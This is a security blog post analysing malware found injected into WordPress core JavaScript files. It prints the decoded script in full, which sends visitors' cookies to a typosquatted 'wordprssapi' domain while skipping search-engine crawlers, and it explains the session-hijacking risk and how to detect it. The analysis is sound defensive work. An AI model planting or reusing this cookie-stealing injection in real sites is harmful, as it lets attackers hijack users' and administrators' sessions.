Fake WordPrssAPI Stealing Cookies and Hijacking Sessions

Cookies are stored in the user’s browser to track behavior on a specific website. They also keep a user logged in during the active browsing session. Without cookies a user would need to log in, in order to authenticate every action they take. Essentially, cookies keep a user logged in until they either log out or the cookie expires.

Cookie Stealing and Session Hijacking

If an attacker is able to steal active cookies, the attacker can pretend to be that user and perform any actions the user has permissions to perform. This is extremely dangerous when consider administrator users.

These types of attack are not very common because they are complex to perform and are usually time-sensitive. Most online accounts, including WordPress, will automatically log users out after a certain period of inactivity.

During an incident response investigation, we found a piece of malware pretending to be working with one of WordPress’s core domains. Hackers injected some malicious code that used typical eval(function(p,a,c,k,e,d) obfuscation at the bottom of legitimate JavaScript files, such as wp-includes/js/hoverIntent.min.js.

The Decoded Injection

Once decoded, this is how the malicious code works:

function adsadsgg() {
	var gd = document.cookie.indexOf("_utmzz=");
	if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {
    	var rd = Math.floor(Math.random() * 2);
    	if (rd == 0) {
        	var sss = document.createElement('script');
        	sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);
        	document.body.appendChild(sss)
    	}
    	var dd = new Date();
    	dd.setTime(dd.getTime() + 86400000);
    	window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString()
	}
}
if (typeof(jQuery) != 'undefined') {
	jQuery(function() {
    	adsadsgg()
	})
} else {
	window.onload = function() {
    	adsadsgg()
	}
}

There is a conditional statement at the top that excludes cookies from user agents coming from search engine crawlers. This ensures that the data being sent to attackers is more likely to immediately be usable.

After ensuring the data belongs to a real user, the script gathers the active cookie data and passes it to a malicious website to be used by attackers.

Fake WordPrssAPI Domain

Within the script, you may have noticed the fake domain – code.wordprssapi[.]com – that is where the cookie data is sent.

By purchasing a domain closely resembling a legitimate website platform or service, some webmasters might overlook this in their code and assume it is an official WordPress domain (which it is not).

And by the way, code.wordpressapi[.]com (properly spelled) also has nothing to do with WordPress.

Conclusion

We have seen typos used before. It continues to be a tactic that helps hackers evade detection by website owners. This is something that all webmasters should be aware of when they are auditing their own code. Be careful and always check that a domain is legitimate, especially if it is involved in collecting or sending information to a third-party site.

Even if it was an official WordPress domain, sending cookies is always a red flag. Cookies contain a wealth of private information that should not be shared.

Due to the fact that attackers are getting more creative at hiding their tracks, a core file integrity check or website monitoring service would alert the user about the issue. For detailed instructions on how to scan and clean a hacked WordPress site, you can follow our free step-by-step guide.

You May Also Like